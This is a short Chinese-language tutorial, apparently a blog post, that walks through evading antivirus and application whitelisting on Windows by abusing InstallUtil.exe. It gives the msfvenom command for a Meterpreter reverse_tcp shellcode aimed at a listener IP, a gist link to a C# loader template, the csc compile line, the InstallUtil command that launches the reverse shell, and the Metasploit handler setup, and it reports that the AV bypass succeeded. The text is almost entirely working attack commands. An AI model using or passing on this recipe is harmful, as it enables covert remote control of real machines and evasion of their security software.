1)通过msfvenom生成C#的shellcode
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.111 lport=4443 -f csharp |
2)下载InstallUtil-Shellcode.cs,将上面生成的shellcode复制到该cs文件中
1 | https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260 |
3)csc编译InstallUtil-ShellCode.cs
1 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs |
编译生成的文件后缀名无所谓exe dll txt都可以,但只能InstallUtil.exe来触发
4)InstallUtil.exe执行 反弹shell
1 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe |
成功bypass av,反弹shell:
补充:MSF开启监听
1 | use exploit/multi/handler |
参考:
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/